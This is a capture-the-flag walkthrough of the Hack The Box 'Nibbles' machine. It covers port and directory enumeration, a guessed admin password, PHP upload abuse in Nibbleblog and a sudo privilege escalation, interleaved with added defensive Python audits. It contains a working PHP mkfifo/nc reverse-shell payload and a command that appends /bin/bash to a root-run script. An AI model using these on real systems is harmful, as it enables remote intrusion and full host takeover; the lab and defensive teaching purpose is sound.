Hackthebox - Nibbles

  • Linux


sudo nmap -T4 -sC -sV -O -Pn -p- 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-10 17:33 EST
Nmap scan report for
Host is up (0.055s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.58 seconds

Port 80

  • If we browse there, we get a hello world page.

  • If we check the source code, we find an interesting comment.

  • This brings us here.

  • Let's see what info we get with whatweb.

Enumerate directories in nibbleblog

└──╼ $gobuster dir -u --wordlist /usr/share/wordlists/dirb/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/02/11 08:07:07 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 301]
/.htpasswd            (Status: 403) [Size: 306]
/admin                (Status: 301) [Size: 321] [-->]
/admin.php            (Status: 200) [Size: 1401]                                          
/.htaccess            (Status: 403) [Size: 306]                                           
/content              (Status: 301) [Size: 323] [-->]
/index.php            (Status: 200) [Size: 2987]                                            
/languages            (Status: 301) [Size: 325] [-->]
/plugins              (Status: 301) [Size: 323] [-->]  
/README               (Status: 200) [Size: 4628]                                              
/themes               (Status: 301) [Size: 322] [-->]   
2023/02/11 08:07:22 Finished
  • Admin

  • Readme

  • Content

  • Plugins

  • Themes

  • Admin.php

  • We also find multiple XML files. The users.xml and config.xml seem interesting.

  • Users

<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">0</session_fail_count>
<session_date type="integer">1514544131</session_date>
<blacklist type="string" ip="">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
  • Config

<name type="string">Nibbles</name>
<slogan type="string">Yum yum</slogan>
<footer type="string">Powered by Nibbleblog</footer>
<advanced_post_options type="integer">0</advanced_post_options>
<url type="string"></url>
<path type="string">/nibbleblog/</path>
<items_rss type="integer">4</items_rss>
<items_page type="integer">6</items_page>
<language type="string">en_US</language>
<timezone type="string">UTC</timezone>
<timestamp_format type="string">%d %B, %Y</timestamp_format>
<locale type="string">en_US</locale>
<img_resize type="integer">1</img_resize>
<img_resize_width type="integer">1000</img_resize_width>
<img_resize_height type="integer">600</img_resize_height>
<img_resize_quality type="integer">100</img_resize_quality>
<img_resize_option type="string">auto</img_resize_option>
<img_thumbnail type="integer">1</img_thumbnail>
<img_thumbnail_width type="integer">190</img_thumbnail_width>
<img_thumbnail_height type="integer">190</img_thumbnail_height>
<img_thumbnail_quality type="integer">100</img_thumbnail_quality>
<img_thumbnail_option type="string">landscape</img_thumbnail_option>
<theme type="string">simpler</theme>
<notification_comments type="integer">1</notification_comments>
<notification_session_fail type="integer">0</notification_session_fail>
<notification_session_start type="integer">0</notification_session_start>
<notification_email_to type="string">admin@nibbles.com</notification_email_to>
<notification_email_from type="string">noreply@</notification_email_from>
<seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
<seo_site_description type="string"/>
<seo_keywords type="string"/>
<seo_robots type="string"/>
<seo_google_code type="string"/>
<seo_bing_code type="string"/>
<seo_author type="string"/>
<friendly_urls type="integer">0</friendly_urls>
<default_homepage type="integer">0</default_homepage>
  • This confirms that a user named admin exists.

  • We cannot brute-force the login because of the IP blacklist that is set as a protection.

  • The word nibbles keeps coming back. Let's try it as the password for admin. It works.
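
As an added defender-side example (not code from this writeup or from the Nibbleblog project), the script below turns the users.xml and config.xml fragments above into two well-formed, constructed samples and shows what an operator can read out of them: the login failure counter and the blacklisted IPs that Nibbleblog's brute-force protection records (converted from epoch to readable dates so they can be matched against web logs), and a check that the admin password is not simply the site name or slogan, which is the weakness the guess "nibbles" relied on. Field names are the ones in the fragments; the IPs, the failure counts and the second blacklist entry are constructed.

```python
"""Read what Nibbleblog's users.xml and config.xml reveal about login abuse
and password choice.  Added example, not code from the writeup or from
Nibbleblog; the two XML samples are constructed from the fragments above
(wrapped in a root element, with IPs and counters filled in)."""
import datetime as dt
import re
import xml.etree.ElementTree as ET

# Constructed sample: the users.xml fields seen above, plus a second
# blacklist entry, with documentation-range IPs (192.0.2.0/24).
USERS_XML = """<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">3</session_fail_count>
<session_date type="integer">1514544131</session_date>
<blacklist type="string" ip="192.0.2.10">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
<blacklist type="string" ip="192.0.2.77">
<date type="integer">1514544100</date>
<fail_count type="integer">6</fail_count>
</blacklist>
</user>
</users>"""

# Constructed sample: the config.xml keys that carry human-chosen words.
CONFIG_XML = """<config>
<name type="string">Nibbles</name>
<slogan type="string">Yum yum</slogan>
<footer type="string">Powered by Nibbleblog</footer>
<path type="string">/nibbleblog/</path>
</config>"""


def blacklist_report(users_xml: str) -> list[dict]:
    """One record per user: failure counter plus each blacklisted IP, with the
    epoch timestamps converted to ISO dates so they can be correlated with logs."""
    report = []
    for user in ET.fromstring(users_xml).findall("user"):
        entries = []
        for bl in user.findall("blacklist"):
            epoch = int(bl.findtext("date", "0"))
            entries.append({
                "ip": bl.get("ip", ""),
                "fail_count": int(bl.findtext("fail_count", "0")),
                "date": dt.datetime.fromtimestamp(epoch, dt.timezone.utc).isoformat(),
            })
        report.append({
            "username": user.get("username"),
            "session_fail_count": int(user.findtext("session_fail_count", "0")),
            "blacklist": entries,
        })
    return report


def noisy_sources(users_xml: str, threshold: int = 5) -> list[str]:
    """IPs whose recorded failure count reached the threshold: candidates for an alert."""
    ips = []
    for rec in blacklist_report(users_xml):
        ips.extend(e["ip"] for e in rec["blacklist"] if e["fail_count"] >= threshold)
    return ips


def password_derived_from_site(password: str, config_xml: str) -> bool:
    """True if the password is the site name, slogan or footer, or a single word
    from them: 'nibbles' against a site named Nibbles is exactly this case."""
    root = ET.fromstring(config_xml)
    words = set()
    for key in ("name", "slogan", "footer"):
        text = (root.findtext(key) or "").lower()
        words.add(text)
        words.update(re.findall(r"[a-z0-9]+", text))
    words.discard("")
    return password.lower() in words


if __name__ == "__main__":
    for rec in blacklist_report(USERS_XML):
        print(rec["username"], "failures:", rec["session_fail_count"])
        for e in rec["blacklist"]:
            print("  blacklisted", e["ip"], "fails:", e["fail_count"], "at", e["date"])
    print("alert on:", noisy_sources(USERS_XML))
    print("admin password derived from site name?",
          password_derived_from_site("nibbles", CONFIG_XML))
```

The blacklist only slows a guessing attacker down; the password check is the part that would actually have stopped this login, and it belongs in the admin password change form rather than in an after-the-fact audit.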

  • While looking for info on Nibbleblog we found a CVE: CVE-2015-6967.

  • It is also worth having a look around.

  • This way we find a plugin, "My image", that allows us to upload files.

  • Let's try to upload a PHP file and see if it gets executed. Here is our PHP file.

  • The file seems to be uploaded. When we explored the files earlier there was a content directory, so our file is probably somewhere in there; let's have a look. Yes, there is a new image.php file here.

  • And our command (ls) works: we have command execution!
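
As an added example (not code from this writeup or from the Nibbleblog project), here is the check the "My image" upload path lacked, together with a sweep a defender can run over an existing content/ directory to find files like the image.php that appeared above. The sample tree built by demo(), its file names and its contents are constructed; the only page-specific detail reused is that a .php file was stored under content/ and executed from there.

```python
"""Upload validation the "My image" plugin lacked, and a sweep for files that
should not be in a content/ directory.  Added example, not code from the
writeup or from Nibbleblog; the sample tree built by demo() is constructed."""
import os
import re
import tempfile

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_EXT = {".php", ".phtml", ".php3", ".php5", ".phar"}
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Decide whether an upload may be stored.  Every extension is checked, not
    only the last one, so 'x.php.png' is rejected; then the first bytes must
    match the claimed image type; then the body must not contain a PHP tag."""
    parts = os.path.basename(filename).lower().split(".")
    exts = {"." + p for p in parts[1:]}
    if not exts or not exts <= ALLOWED_EXT:
        return False, "extension not in allowlist"
    last = "." + parts[-1]
    if not data.startswith(MAGIC[last]):
        return False, "content does not match a %s image" % last
    if PHP_TAG.search(data):
        return False, "PHP tag found inside the file"
    return True, "ok"


def find_executable_uploads(directory: str) -> list[str]:
    """Relative paths under directory with a script extension or a PHP tag in
    their first 64 KiB: what a periodic check of content/ should report."""
    hits = []
    for dirpath, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                head = fh.read(64 * 1024)
            if ext in SCRIPT_EXT or PHP_TAG.search(head):
                hits.append(os.path.relpath(path, directory))
    return sorted(hits)


def demo() -> list[str]:
    """Constructed content/ tree: one genuine PNG and one .php file that was
    accepted as an 'image'; returns what the sweep reports."""
    root = tempfile.mkdtemp(prefix="content-")
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, "uploads", "logo.png"), "wb") as fh:
        fh.write(MAGIC[".png"][0] + b"\x00" * 32)
    with open(os.path.join(root, "uploads", "image.php"), "wb") as fh:
        fh.write(b"<?php echo 1; ?>\n")  # harmless stand-in for an uploaded script
    return find_executable_uploads(root)


if __name__ == "__main__":
    print(validate_upload("logo.png", MAGIC[".png"][0] + b"\x00" * 32))
    print(validate_upload("image.php", b"<?php echo 1; ?>"))
    print("suspicious files in content/:", demo())
```

A second layer that does not depend on the plugin getting this right is to serve the upload directory with script execution disabled at the web server (for Apache with mod_php, `php_admin_flag engine off` in a Directory block for that path), so a file that slips past validation is returned as bytes instead of being run.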

  • We could use a webshell, but let's go for a reverse shell instead.

  • Let's edit our previous file: <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444) >/tmp/f'); ?>

  • We now need to set up a listener: rlwrap nc -lnvp 4444

  • We get a shell.

  • Along with the flag there is a zip file, personal.zip, that seems interesting for later.

Privilege escalation

  • Let's have a look at the zip file. There is a stuff folder with a bash script inside.

  • Using sudo -l we see that we are able to run it as root.

  • Let's append /bin/bash to the script; since the script runs as root, this should give us a root shell: echo '/bin/bash' | tee -a /home/nibbler/personal/stuff/monitor.sh

  • Indeed, if we run sudo /home/nibbler/personal/stuff/monitor.sh we get root and can grab the last flag.
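
The escalation works because one file is both granted to the user through sudo and writable by that same user. As an added example (not code from this writeup), the audit below parses a rule line in the format `sudo -l` prints, extracts the granted command paths and reports every one that the invoking account can modify, either directly or by replacing it through a writable parent directory. The monitor.sh path is the one from this box; the NOPASSWD tag and the other rule lines in the test are constructed, as is the tree that demo() builds in a temporary directory (one layout like the box's, one hardened).

```python
"""Find sudo-granted scripts that the invoking user could rewrite.
Added example, not code from the writeup.  Judgement is by ownership and
mode bits only (ACLs, capabilities and root's own override are ignored)."""
import os
import re
import stat
import tempfile

# Matches one rule line as printed by `sudo -l`, e.g.
# "(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
# The path is the one from this box; NOPASSWD is a constructed detail.
SUDO_RULE_RE = re.compile(r"\(\s*[^)]*\)\s*(?:NOPASSWD:\s*)?(.+)")


def sudo_targets(rule_line: str) -> list[str]:
    """Command paths granted by one sudo -l rule line (arguments dropped)."""
    m = SUDO_RULE_RE.search(rule_line)
    if not m:
        return []
    return [c.strip().split()[0] for c in m.group(1).split(",") if c.strip()]


def writable_by(path: str, uid: int, gids: set) -> bool:
    """Can an account with this uid and these gids write to path, by mode bits?"""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def audit_sudo_scripts(paths: list, uid: int, gids: set) -> dict:
    """For each granted path: the components the account can write, i.e. the file
    itself or its parent directory (a writable parent lets the file be replaced).
    An empty list means the rule does not have this weakness."""
    findings = {}
    for path in paths:
        weak = []
        for comp in (path, os.path.dirname(path)):
            if os.path.exists(comp) and writable_by(comp, uid, gids):
                weak.append(comp)
        findings[path] = weak
    return findings


def demo() -> dict:
    """Constructed tree: a user-owned script under a user-owned directory (the
    Nibbles layout) next to a read-only script in a read-only directory."""
    root = tempfile.mkdtemp(prefix="sudo-audit-")
    weak_dir = os.path.join(root, "personal", "stuff")
    safe_dir = os.path.join(root, "opt", "bin")
    os.makedirs(weak_dir)
    os.makedirs(safe_dir)
    weak = os.path.join(weak_dir, "monitor.sh")
    safe = os.path.join(safe_dir, "monitor.sh")
    for p in (weak, safe):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho monitoring\n")
    os.chmod(weak, 0o755)
    os.chmod(safe, 0o555)
    os.chmod(safe_dir, 0o555)
    uid, gids = os.getuid(), {os.getgid()}
    findings = audit_sudo_scripts([weak, safe], uid, gids)
    return {"weak": findings[weak], "safe": findings[safe]}


if __name__ == "__main__":
    print(sudo_targets("(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"))
    for label, comps in demo().items():
        print(label, "writable components:", comps or "none")
```

The fix on a real host is the same as what the "safe" layout models: root-owned script, root-owned directory, no write bit for the group or others, so the sudo rule grants exactly the script the administrator reviewed and nothing the user can turn it into.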
